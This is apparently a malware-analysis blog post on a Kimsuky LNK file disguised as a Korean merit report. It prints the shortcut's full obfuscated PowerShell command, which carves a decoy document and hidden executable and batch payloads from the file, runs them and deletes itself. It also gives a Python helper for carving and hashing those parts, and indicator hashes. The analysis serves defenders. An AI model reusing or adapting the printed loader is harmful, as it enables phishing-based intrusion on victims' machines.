lazarusholic

Everyday is lazarus.dayβ

Malware made by Kimsuky(김수키) disguised as a merit report (individual, form)

2025-01-21, Sakai
https://wezard4u.tistory.com/429386
#Kimsuky #LNK

Contents

Today I will write about 공적 조서(개인,양식).lnk, a piece of malware made by Kimsuky(김수키) that is disguised as a merit report (individual, form).
The malware comes in the LNK file format, and when the file is opened it runs through PowerShell.
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments: /k for /f "tok(e)ns=*" %a in
('dir C:\Windows\SysW(o)w64\WindowsPowerS(h)ell\v1.0\*rshel(l).exe /s /b /od')
do c(a)ll %a "$dirPath = Get-Locati(o)n; if($dirPath -Match 'Sys(t)em32'
-or $dirPath -Ma(t)ch 'Program Files') {$dirPath = '%temp%'};$exs=@('(.)lnk')
;$lnkP(a)th = Get-ChildItem -Path $di(r)Path -Recurse *.* -(F)ile | where
{$_.exte(n)sion -in $exs} | whe(r)e-object {$_.len(g)th -eq 0x0DD(4)B11F} |
Selec(t)-Object -Ex(p)andProperty FullName ;($)lnkFile=New-(O)bject System.IO
.Fil(e)Stream($lnkPath, [Sy(s)tem.IO.FileMode]::Ope(n), [System.(I)O.FileAccess]
::Read);$lnkFil(e).Seek(0x00(0)0111E, [System.IO(.)SeekOrigin]::Begin);$pdfFile=
Ne(w)-Objec(t) byte[] 0x0000AD(3)6;$lnkFile.Read($pdfFile, 0, 0x0000(A)D36);$pdf
Path = $l(n)kPath.replace('.lnk','(.)hwpx');sc $pdfPath $pdf(F)ile -Encodi(n)g B
yte;& $pdfPath;($)lnkFile.Seek(0x000(0)BE54,[System.IO(.)SeekOrigin]::Begin);$ex
(e)File=New-Object(b)yte[] 0x000D9190;$lnkFile.Read($exeFile, 0, 0x000D9190);$ex
ePath=$env:temp+'\caption.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek
(0x000E4FE4,[System.IO.SeekOr(i)gin]::Begin);$stringB(y)te = New-Object byte[] 0
x00000636(;)$lnkFile.Read($str(i)ngByte, 0, 0x(0)0000636); $batSt(r)Path = $env:
temp+'\'+'elephant(.)dat';$string = [System(.)Text.Encoding]::UTF8.GetString($st
(r)ingByte);$string | Out-File (-)FilePath $batStrP(a)th -Encoding ascii;$lnkF(i
)le.Seek(0x000E561A,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[]
0x00000147;$lnkFile.Read($batByte, 0, 0x00000147);$executePath = $env:temp+'\'+'
shark'(+)'e.b'(+)'a'(+)'t'; Write-Host $ex(e)cutePath; Write-Host $bat(S)trPath;
$bast(S)tring = [System(.)Text.E(n)coding]::UTF8.Ge(t)String($batByte);$bastStri
ng | (O)ut-File -FilePath $exec(u)tePath -Encoding (a)scii; &$executePath; $lnkF
il(e).Close(); remove(-)item -path $lnkPath -force; "&& exit
iconlocation: C:\Program Files (x86)\Hnc\Office 2018\HOffice100\Bin\Hwp.exe
}
Code analysis
Abusing PowerShell, from the file …
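The command line above reads the decoy .hwpx and the remaining payloads straight out of the .lnk at fixed offsets. The Python below is an added triage example, not the blog's own code: it strips the '(x)' letter-splitting, recovers the Seek/Read offset-length pairs and the output file names, and carves those regions out of a file image so each part can be hashed on its own. SAMPLE_CMD is a constructed, shortened copy of that command line, and the magic-byte expectations (PK for the .hwpx, MZ for the .exe) are assumptions.

```python
# Triage helper for the self-carving LNK command line shown above.
import hashlib
import re

# Constructed sample: the Seek/Read chain and file names from the command line
# above, re-joined across the blog's line wraps and shortened for brevity.
SAMPLE_CMD = (
    "$lnkFil(e).Seek(0x00(0)0111E, [System.IO(.)SeekOrigin]::Begin);$pdfFile=Ne(w)-Objec(t) byte[]"
    " 0x0000AD(3)6;$lnkFile.Read($pdfFile, 0, 0x0000(A)D36);$pdfPath = $l(n)kPath.replace('.lnk'"
    ",'(.)hwpx');($)lnkFile.Seek(0x000(0)BE54,[System.IO(.)SeekOrigin]::Begin);$ex(e)File=New-Obj"
    "ect(b)yte[] 0x000D9190;$lnkFile.Read($exeFile, 0, 0x000D9190);$exePath=$env:temp+'\\caption"
    ".dat';$lnkFile.Seek(0x000E4FE4,[System.IO.SeekOr(i)gin]::Begin);$stringB(y)te = New-Object "
    "byte[] 0x00000636(;)$lnkFile.Read($str(i)ngByte, 0, 0x(0)0000636); $batSt(r)Path = $env:temp"
    "+'\\'+'elephant(.)dat';$lnkF(i)le.Seek(0x000E561A,[System.IO.SeekOrigin]::Begin);$batByte = "
    "New-Object byte[] 0x00000147;$lnkFile.Read($batByte, 0, 0x00000147);$executePath = $env:temp"
    "+'\\'+'shark'(+)'e.b'(+)'a'(+)'t';"
)

def deobfuscate(cmd):
    """Strip the '(c)' wrapper around single characters, e.g. 'tok(e)ns' -> 'tokens'.
    Only one-character groups are touched, so real call parentheses survive."""
    return re.sub(r"\((.)\)", r"\1", cmd)

def carve_plan(cmd):
    """Pair each .Seek(offset) with the .Read(buf, 0, length) that follows it."""
    plain = deobfuscate(cmd)
    seeks = [int(m, 16) for m in re.findall(r"\.Seek\(0x([0-9A-Fa-f]+)", plain)]
    reads = [int(m, 16) for m in re.findall(r"\.Read\(\$\w+,\s*0,\s*0x([0-9A-Fa-f]+)", plain)]
    return list(zip(seeks, reads))

def dropped_names(cmd):
    """File names the script writes, after joining split literals like 'a'+'b'."""
    plain = re.sub(r"'\+'", "", deobfuscate(cmd))
    return re.findall(r"'\\?([\w.]*\.(?:hwpx|dat|bat))'", plain)

def carve(image, plan):
    """Cut each planned region out of the LNK image and describe it."""
    found = []
    for offset, length in plan:
        chunk = bytes(image[offset:offset + length])
        found.append({"offset": offset, "length": length,
                      "complete": len(chunk) == length,  # False if the image is truncated
                      "magic": chunk[:2],  # assumed: b'PK' for the .hwpx, b'MZ' for the .exe
                      "sha256": hashlib.sha256(chunk).hexdigest()})
    return found

if __name__ == "__main__":
    print(carve_plan(SAMPLE_CMD), dropped_names(SAMPLE_CMD))
```

Feed carve() the raw bytes of a sample .lnk to get one hash per embedded part; a "complete" of False means the image is shorter than the script expects.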

IoC

7df7ad7b88887a06b559cd453e7b65230d0cccff1a403328a521d8753000c6c9
5adfa76b72236bf017f7968fd012e968
5f0d09853fb459500237105201bbf33c09da2126